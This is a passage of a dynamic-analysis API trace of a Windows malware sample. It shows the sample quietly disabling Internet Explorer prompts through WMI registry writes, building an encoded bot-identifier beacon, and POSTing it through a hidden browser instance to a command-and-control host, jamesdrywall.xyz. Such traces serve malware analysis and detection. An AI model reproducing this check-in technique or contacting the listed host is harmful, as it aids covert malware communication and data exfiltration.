[3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x2f10f40*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x18fe28 | out: ppv=0x18fe28*=0x30b0880) returned 0x0 [0065.151] WbemLocator:IWbemLocator:ConnectServer (in: This=0x30b0880, strNetworkResource="", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x18fe2c | out: ppNamespace=0x18fe2c*=0x30bcfe4) returned 0x0 [0065.166] CoSetProxyBlanket (pProxy=0x30bcfe4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0065.166] WbemLocator:IUnknown:Release (This=0x30b0880) returned 0x0 [0065.166] IWbemServices:GetObject (in: This=0x30bcfe4, strObjectPath="", lFlags=0, pCtx=0x0, ppObject=0x18fe50, ppCallResult=0x0 | out: ppObject=0x18fe50*=0x30c5858, ppCallResult=0x0) returned 0x0 [0065.173] IWbemClassObject:GetMethod (in: This=0x30c5858, wszName="SetBinaryValue", lFlags=0, ppInSignature=0x18fe58, ppOutSignature=0x0 | out: ppInSignature=0x18fe58*=0x30cda50, ppOutSignature=0x0) returned 0x0 [0065.174] IWbemClassObject:Put (This=0x30cda50, wszName="hDefKey", lFlags=0, pVal=0x18fe08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000001, varVal2=0x0), Type=0) returned 0x0 [0065.174] IWbemClassObject:Put (This=0x30cda50, wszName="sSubKeyName", lFlags=0, pVal=0x18fe08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\Main", varVal2=0x0), Type=0) returned 0x0 [0065.174] IWbemClassObject:Put (This=0x30cda50, wszName="sValueName", lFlags=0, pVal=0x18fe08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="IE8RunOnceLastShown_TIMESTAMP", varVal2=0x0), Type=0) returned 0x0 [0065.174] IWbemClassObject:Put (This=0x30cda50, wszName="uValue", lFlags=0, pVal=0x18fe88*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5150c0*(cDims=0x1, fFeatures=0x80, cbElements=0x1, cLocks=0x0, pvData=0x4fe638*, rgsabound=((cElements=0x8, lLbound=0))), varVal2=0x0), Type=0) returned 0x0 [0065.175] IWbemServices:ExecMethod (in: This=0x30bcfe4, strObjectPath="", strMethodName="", lFlags=0, pCtx=0x0, pInParams=0x30cda50, ppOutParams=0x18fe5c*=0x0, ppCallResult=0x0 | out: ppOutParams=0x18fe5c*=0x30ce488, ppCallResult=0x0) returned 0x0 [0065.209] IWbemClassObject:Get (in: This=0x30ce488, wszName="ReturnValue", lFlags=0, pVal=0x18fe28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18fe28*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0065.209] IUnknown:Release (This=0x30ce488) returned 0x0 [0065.209] IUnknown:Release (This=0x30cda50) returned 0x0 [0065.209] IUnknown:Release (This=0x30c5858) returned 0x0 [0065.209] WbemLocator:IUnknown:Release (This=0x30bcfe4) returned 0x0 [0065.211] CoCreateInstance (in: rclsid=0x2f10f30*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x2f10f40*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x18fe50 | out: ppv=0x18fe50*=0x30b0880) returned 0x0 [0065.211] WbemLocator:IWbemLocator:ConnectServer (in: This=0x30b0880, strNetworkResource="", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x18fe54 | out: ppNamespace=0x18fe54*=0x30cda94) returned 0x0 [0065.226] CoSetProxyBlanket (pProxy=0x30cda94, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0065.226] WbemLocator:IUnknown:Release (This=0x30b0880) returned 0x0 [0065.227] IWbemServices:GetObject (in: This=0x30cda94, strObjectPath="", lFlags=0, pCtx=0x0, ppObject=0x18fe78, ppCallResult=0x0 | out: ppObject=0x18fe78*=0x30c5800, ppCallResult=0x0) returned 0x0 [0065.233] IWbemClassObject:GetMethod (in: This=0x30c5800, wszName="SetStringValue", lFlags=0, ppInSignature=0x18fe80, ppOutSignature=0x0 | out: ppInSignature=0x18fe80*=0x30cdaa8, ppOutSignature=0x0) returned 0x0 [0065.233] IWbemClassObject:Put (This=0x30cdaa8, wszName="hDefKey", lFlags=0, pVal=0x18fe30*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000001, varVal2=0x0), Type=0) returned 0x0 [0065.233] IWbemClassObject:Put (This=0x30cdaa8, wszName="sSubKeyName", lFlags=0, pVal=0x18fe30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\Main", varVal2=0x0), Type=0) returned 0x0 [0065.233] IWbemClassObject:Put (This=0x30cdaa8, wszName="sValueName", lFlags=0, pVal=0x18fe30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Check_Associations", varVal2=0x0), Type=0) returned 0x0 [0065.233] IWbemClassObject:Put (This=0x30cdaa8, wszName="sValue", lFlags=0, pVal=0x18feb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="no", varVal2=0x0), Type=0) returned 0x0 [0065.234] IWbemServices:ExecMethod (in: This=0x30cda94, strObjectPath="", strMethodName="", lFlags=0, pCtx=0x0, pInParams=0x30cdaa8, ppOutParams=0x18fe84*=0x0, ppCallResult=0x0 | out: ppOutParams=0x18fe84*=0x30ce4e8, ppCallResult=0x0) returned 0x0 [0065.253] IWbemClassObject:Get (in: This=0x30ce4e8, wszName="ReturnValue", lFlags=0, pVal=0x18fe50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18fe50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0065.253] IUnknown:Release (This=0x30ce4e8) returned 0x0 [0065.253] IUnknown:Release (This=0x30cdaa8) returned 0x0 [0065.253] IUnknown:Release (This=0x30c5800) returned 0x0 [0065.253] WbemLocator:IUnknown:Release (This=0x30cda94) returned 0x0 [0065.254] CreateWaitableTimerA (lpTimerAttributes=0x0, bManualReset=1, lpTimerName=0x0) returned 0x184 [0065.255] lstrlenA (lpString="https://jamesdrywall.xyz") returned 24 [0065.255] StrStrIA (lpFirst="https://jamesdrywall.xyz", lpSrch="http://") returned 0x0 [0065.257] StrStrIA (lpFirst="https://jamesdrywall.xyz", lpSrch="https://") returned="https://jamesdrywall.xyz" [0065.258] lstrlenA (lpString="jamesdrywall.xyz") returned 16 [0065.258] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x11) returned 0x2f12870 [0065.258] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x20) returned 0x2f12890 [0065.258] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x800) returned 0x2f128b8 [0065.259] QueryPerformanceFrequency (in: lpFrequency=0x18fdd0 | out: lpFrequency=0x18fdd0*=100000000) returned 1 [0065.259] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdc8 | out: lpPerformanceCount=0x18fdc8*=18591424326) returned 1 [0065.259] _snprintf (in: _Dest=0x2f128b8, _Count=0x7ff, _Format="type=%u&soft=%u&version=%u&user=%08x%08x%08x%08x&group=%u&id=%08x&arc=%u&crc=%08x&uptime=%u" | out: _Dest="type=1&soft=3&version=300794&user=2c896626bd8d8a8532e64548597fff76&group=201910301&id=00000024&arc=0&crc=00000000&uptime=185") returned 124 [0065.260] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x5) returned 0x2f130c0 [0065.260] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x6) returned 0x2f130d0 [0065.260] lstrlenA (lpString="%s=%s&") returned 6 [0065.260] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x10) returned 0x2f130e0 [0065.260] sprintf (in: _Dest=0x2f130e0, _Format="%s=%s&" | out: _Dest="vppyn=octx&") returned 11 [0065.260] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f130d0 | out: hHeap=0x1f30000) returned 1 [0065.260] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f130c0 | out: hHeap=0x1f30000) returned 1 [0065.260] lstrlenA (lpString="vppyn=octx&") returned 11 [0065.260] lstrlenA (lpString="type=1&soft=3&version=300794&user=2c896626bd8d8a8532e64548597fff76&group=201910301&id=00000024&arc=0&crc=00000000&uptime=185") returned 124 [0065.260] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x88) returned 0x2f130f8 [0065.261] strcpy (in: _Dest=0x2f130f8, _Source="vppyn=octx&" | out: _Dest="vppyn=octx&") returned="vppyn=octx&" [0065.261] lstrcatA (in: lpString1="vppyn=octx&", lpString2="type=1&soft=3&version=300794&user=2c896626bd8d8a8532e64548597fff76&group=201910301&id=00000024&arc=0&crc=00000000&uptime=185" | out: lpString1="vppyn=octx&type=1&soft=3&version=300794&user=2c896626bd8d8a8532e64548597fff76&group=201910301&id=00000024&arc=0&crc=00000000&uptime=185") returned="vppyn=octx&type=1&soft=3&version=300794&user=2c896626bd8d8a8532e64548597fff76&group=201910301&id=00000024&arc=0&crc=00000000&uptime=185" [0065.261] lstrlenA (lpString="vppyn=octx&type=1&soft=3&version=300794&user=2c896626bd8d8a8532e64548597fff76&group=201910301&id=00000024&arc=0&crc=00000000&uptime=185") returned 135 [0065.261] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x90) returned 0x2f13188 [0065.261] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x90) returned 0x2f13220 [0065.261] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f13188 | out: hHeap=0x1f30000) returned 1 [0065.261] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x120) returned 0x2f132b8 [0065.261] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f13220 | out: hHeap=0x1f30000) returned 1 [0065.262] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f130f8 | out: hHeap=0x1f30000) returned 1 [0065.262] StrTrimA (in: psz="Zw145n3A9nTQJBBkGb2nmX7u0xXEn5nLqHBpIHOD2QBd0TGWnBSGrTcc4AmAWJgjsljpzLLeS6EZFEuE1UZ6IOdCnrNRHaO+ZRoQHkWMRxfgp8/OlWqXWGZ+tGd9ljUtUsma39gkUQw3IlIlAkclkKmjuQ1VInoKuJVelYovRLYpFE2UIiaIJo7sSawLjqsr", pszTrimChars="\r\n=" | out: psz="Zw145n3A9nTQJBBkGb2nmX7u0xXEn5nLqHBpIHOD2QBd0TGWnBSGrTcc4AmAWJgjsljpzLLeS6EZFEuE1UZ6IOdCnrNRHaO+ZRoQHkWMRxfgp8/OlWqXWGZ+tGd9ljUtUsma39gkUQw3IlIlAkclkKmjuQ1VInoKuJVelYovRLYpFE2UIiaIJo7sSawLjqsr") returned 0 [0065.262] lstrlenA (lpString="Zw145n3A9nTQJBBkGb2nmX7u0xXEn5nLqHBpIHOD2QBd0TGWnBSGrTcc4AmAWJgjsljpzLLeS6EZFEuE1UZ6IOdCnrNRHaO+ZRoQHkWMRxfgp8/OlWqXWGZ+tGd9ljUtUsma39gkUQw3IlIlAkclkKmjuQ1VInoKuJVelYovRLYpFE2UIiaIJo7sSawLjqsr") returned 192 [0065.262] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x241) returned 0x2f133e0 [0065.262] _snprintf (in: _Dest=0x2f1343f, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0065.262] _snprintf (in: _Dest=0x2f13450, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0065.262] _snprintf (in: _Dest=0x2f1345b, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0065.262] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f132b8 | out: hHeap=0x1f30000) returned 1 [0065.262] lstrlenA (lpString="Zw145n3A9nTQJBBkGb2nmX7u0xXEn5nLqHBpIHOD2QBd0TGWnBSGrTcc4AmAWJgjsljpzLLeS6EZFEuE1UZ6IOdCnrNRHaO_2BZRoQHkWMRxfgp8_2FOlWqXWGZ_2BtGd9ljUtUsma39gkUQw3IlIlAkclkKmjuQ1VInoKuJVelYovRLYpFE2UIiaIJo7sSawLjqsr") returned 198 [0065.262] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0xdf) returned 0x2f130f8 [0065.263] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f133e0 | out: hHeap=0x1f30000) returned 1 [0065.263] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f130e0 | out: hHeap=0x1f30000) returned 1 [0065.264] StrTrimA (in: psz="Zw145n3A9nT/QJBBkGb2nmX7u0xXEn5nLqH/BpIHOD2QBd0TG/WnBSGrTcc4AmAWJ/gjsljpzLLeS/6EZFEuE1UZ6IOd/CnrNRHaO_2BZRoQHkWMRxfg/p8_2FOlWqXWGZ_2BtGd/9ljUtUsma39g/kUQw3IlIlA/kclkKmjuQ1VInoKuJVelYo/vRLYpFE2UIiaIJo7sSaw/Ljqsr", pszTrimChars="\r\n" | out: psz="Zw145n3A9nT/QJBBkGb2nmX7u0xXEn5nLqH/BpIHOD2QBd0TG/WnBSGrTcc4AmAWJ/gjsljpzLLeS/6EZFEuE1UZ6IOd/CnrNRHaO_2BZRoQHkWMRxfg/p8_2FOlWqXWGZ_2BtGd/9ljUtUsma39g/kUQw3IlIlA/kclkKmjuQ1VInoKuJVelYo/vRLYpFE2UIiaIJo7sSaw/Ljqsr") returned 0 [0065.264] lstrlenA (lpString="Zw145n3A9nT/QJBBkGb2nmX7u0xXEn5nLqH/BpIHOD2QBd0TG/WnBSGrTcc4AmAWJ/gjsljpzLLeS/6EZFEuE1UZ6IOd/CnrNRHaO_2BZRoQHkWMRxfg/p8_2FOlWqXWGZ_2BtGd/9ljUtUsma39g/kUQw3IlIlA/kclkKmjuQ1VInoKuJVelYo/vRLYpFE2UIiaIJo7sSaw/Ljqsr") returned 210 [0065.264] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x34) returned 0x2f131e0 [0065.264] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x5) returned 0x2f130c0 [0065.264] wsprintfA (in: param_1=0x2f131e0, param_2="Content-Disposition: form-data; name=\"%s\"" | out: param_1="Content-Disposition: form-data; name=\"ebld\"") returned 43 [0065.264] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f130c0 | out: hHeap=0x1f30000) returned 1 [0065.264] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0xf0) returned 0x2f13220 [0065.264] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0xf0) returned 0x2f13318 [0065.264] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f13220 | out: hHeap=0x1f30000) returned 1 [0065.265] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x77) returned 0x2f13220 [0065.265] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x9) returned 0x2f130c0 [0065.265] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x4) returned 0x2f130d8 [0065.265] wsprintfA (in: param_1=0x2f13220, param_2="Content-Disposition: form-data; name=\"%s\"" | out: param_1="Content-Disposition: form-data; name=\"tpkmooyp\"") returned 47 [0065.265] wsprintfA (in: param_1=0x2f1324f, param_2="; filename=\"%s\"\r\n%s" | out: param_1="; filename=\"rbn\"\r\nContent-Type: application/octet-stream") returned 56 [0065.265] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f130d8 | out: hHeap=0x1f30000) returned 1 [0065.265] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f130c0 | out: hHeap=0x1f30000) returned 1 [0065.265] lstrlenA (lpString="type=1&soft=3&version=300794&user=2c896626bd8d8a8532e64548597fff76&group=201910301&id=00000024&arc=0&crc=00000000&uptime=185") returned 124 [0065.265] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f128b8 | out: hHeap=0x1f30000) returned 1 [0065.266] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fdc4 | out: lpSystemTimeAsFileTime=0x18fdc4*(dwLowDateTime=0xb9a9570, dwHighDateTime=0x1d61242)) [0065.266] wsprintfA (in: param_1=0x18fdac, param_2="%04x%04x" | out: param_1="f4656a8ffe29edbd") returned 16 [0065.266] lstrlenA (lpString="Content-Disposition: form-data; name=\"ebld\"") returned 43 [0065.266] lstrlenA (lpString="Content-Disposition: form-data; name=\"tpkmooyp\"; filename=\"rbn\"\r\nContent-Type: application/octet-stream") returned 103 [0065.266] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x40) returned 0x2f132a0 [0065.266] wsprintfA (in: param_1=0x2f132a0, param_2="Content-Type: multipart/form-data; boundary=%s" | out: param_1="Content-Type: multipart/form-data; boundary=f4656a8ffe29edbd") returned 60 [0065.266] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x2a9) returned 0x2f128b8 [0065.266] wsprintfA (in: param_1=0x2f128b8, param_2="--%s\r\n%s\r\n\r\n" | out: param_1="--f4656a8ffe29edbd\r\nContent-Disposition: form-data; name=\"ebld\"\r\n\r\n") returned 67 [0065.266] wsprintfA (in: param_1=0x2f129cf, param_2="--%s\r\n%s\r\n\r\n" | out: param_1="--f4656a8ffe29edbd\r\nContent-Disposition: form-data; name=\"tpkmooyp\"; filename=\"rbn\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 127 [0065.266] wsprintfA (in: param_1=0x2f12b40, param_2="--%s--\r\n" | out: param_1="--f4656a8ffe29edbd--\r\n") returned 22 [0065.267] lstrlenA (lpString="Content-Disposition: form-data; name=\"ebld\"") returned 43 [0065.267] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f131e0 | out: hHeap=0x1f30000) returned 1 [0065.267] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f130f8 | out: hHeap=0x1f30000) returned 1 [0065.267] lstrlenA (lpString="Content-Disposition: form-data; name=\"tpkmooyp\"; filename=\"rbn\"\r\nContent-Type: application/octet-stream") returned 103 [0065.267] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f13220 | out: hHeap=0x1f30000) returned 1 [0065.267] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f13318 | out: hHeap=0x1f30000) returned 1 [0065.267] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f12890 | out: hHeap=0x1f30000) returned 1 [0065.267] lstrlenA (lpString="index.htm") returned 9 [0065.268] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0xa) returned 0x2f12890 [0065.268] lstrlenA (lpString="jamesdrywall.xyz") returned 16 [0065.268] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x20) returned 0x2f12b70 [0065.270] StrStrA (lpFirst="jamesdrywall.xyz", lpSrch="//") returned 0x0 [0065.270] StrChrA (lpStart="jamesdrywall.xyz", wMatch=0x2f) returned 0x0 [0065.271] lstrcpyA (in: lpString1=0x2f12b70, lpString2="jamesdrywall.xyz" | out: lpString1="jamesdrywall.xyz") returned="jamesdrywall.xyz" [0065.271] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f12b70 | out: hHeap=0x1f30000) returned 1 [0065.271] lstrlenA (lpString="jamesdrywall.xyz") returned 16 [0065.271] lstrlenA (lpString="index.htm") returned 9 [0065.271] lstrlenA (lpString="https://") returned 8 [0065.271] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x48) returned 0x2f12b70 [0065.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f1097e, cbMultiByte=9, lpWideCharStr=0x2f12b70, cchWideChar=36 | out: lpWideCharStr="https://") returned 9 [0065.271] wsprintfW (in: param_1=0x2f12b80, param_2="%S" | out: param_1="jamesdrywall.xyz") returned 16 [0065.271] wsprintfW (in: param_1=0x2f12ba2, param_2="%S" | out: param_1="index.htm") returned 9 [0065.271] lstrlenA (lpString="Content-Type: multipart/form-data; boundary=f4656a8ffe29edbd") returned 60 [0065.271] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x7c) returned 0x2f12bc0 [0065.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f132a0, cbMultiByte=61, lpWideCharStr=0x2f12bc0, cchWideChar=62 | out: lpWideCharStr="Content-Type: multipart/form-data; boundary=f4656a8ffe29edbd") returned 61 [0065.272] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x10) returned 0x2f12c48 [0065.272] CoCreateInstance (in: rclsid=0x2f10fb0*(Data1=0x2df01, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x4, riid=0x2f10f70*(Data1=0x2df05, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2f12c50 | out: ppv=0x2f12c50*=0x504cfc) returned 0x0 [0069.798] InternetExplorer:IWebBrowserApp:put_Visible (This=0x504cfc, Visible=0) returned 0x0 [0070.197] InternetExplorer:IUnknown:QueryInterface (in: This=0x504cfc, riid=0x2f10f50*(Data1=0xeab22ac1, Data2=0x30c1, Data3=0x11cf, Data4=([0]=0xa7, [1]=0xeb, [2]=0x0, [3]=0x0, [4]=0xc0, [5]=0x5b, [6]=0xae, [7]=0xb)), ppvObject=0x2f12c48 | out: ppvObject=0x2f12c48*=0x505014) returned 0x0 [0070.221] InternetExplorer:IUnknown:QueryInterface (in: This=0x504cfc, riid=0x2f10f60*(Data1=0xd30c1661, Data2=0xcdaf, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x3e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xc9, [6]=0xe2, [7]=0x6e)), ppvObject=0x2f12c4c | out: ppvObject=0x2f12c4c*=0x505134) returned 0x0 [0070.262] InternetExplorer:IWebBrowser:Navigate (This=0x505014, URL="https://jamesdrywall.xyz/index.htm", Flags=0x18fdb8*(varType=0x17, wReserved1=0x18, wReserved2=0xfd90, wReserved3=0x18, varVal1=0xe, varVal2=0x18fd80), TargetFrameName=0x18fdc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), PostData=0x18fde8*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5150f0*(cDims=0x1, fFeatures=0x80, cbElements=0x1, cLocks=0x0, pvData=0x524d08*, rgsabound=((cElements=0x29e, lLbound=0))), varVal2=0x0), Headers=0x18fdd8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Content-Type: multipart/form-data; boundary=f4656a8ffe29edbd", varVal2=0x0)) returned 0x0 [0071.104] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0071.130] Sleep (dwMilliseconds=0x1f4) [0071.630] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0071.632] Sleep (dwMilliseconds=0x1f4) [0072.146] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0072.147] Sleep (dwMilliseconds=0x1f4) [0072.661] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0072.666] Sleep (dwMilliseconds=0x1f4) [0073.206] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0073.252] Sleep (dwMilliseconds=0x1f4) [0073.756] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0073.838] Sleep (dwMilliseconds=0x1f4) [0074.369] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0074.375] Sleep (dwMilliseconds=0x1f4) [0074.875] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0074.877] Sleep (dwMilliseconds=0x1f4) [0075.421] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0075.425] Sleep (dwMilliseconds=0x1f4) [0075.938] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0075.940] Sleep (dwMilliseconds=0x1f4) [0076.452] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0076.455] Sleep (dwMilliseconds=0x1f4) [0076.966] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0076.967] Sleep (dwMilliseconds=0x1f4) [0077.512] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0077.520] Sleep (dwMilliseconds=0x1f4) [0078.027] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0078.028] Sleep (dwMilliseconds=0x1f4) [0078.542] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0078.544] Sleep (dwMilliseconds=0x1f4) [0079.058] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0079.064] Sleep (dwMilliseconds=0x1f4) [0079.572] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0079.574] Sleep (dwMilliseconds=0x1f4) [0080.086] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0080.088] Sleep (dwMilliseconds=0x1f4) [0080.601] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0080.606] Sleep (dwMilliseconds=0x1f4) [0081.115] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0081.117] Sleep (dwMilliseconds=0x1f4) [0081.631] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0081.632] Sleep (dwMilliseconds=0x1f4) [0082.145] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 0x0 [0082.147] Sleep (dwMilliseconds=0x1f4) [0082.660] InternetExplorer:IWebBrowser2:get_ReadyState (in: This=0x505134, plReadyState=0x18fd98 | out: plReadyState=0x18fd98*=1) returned 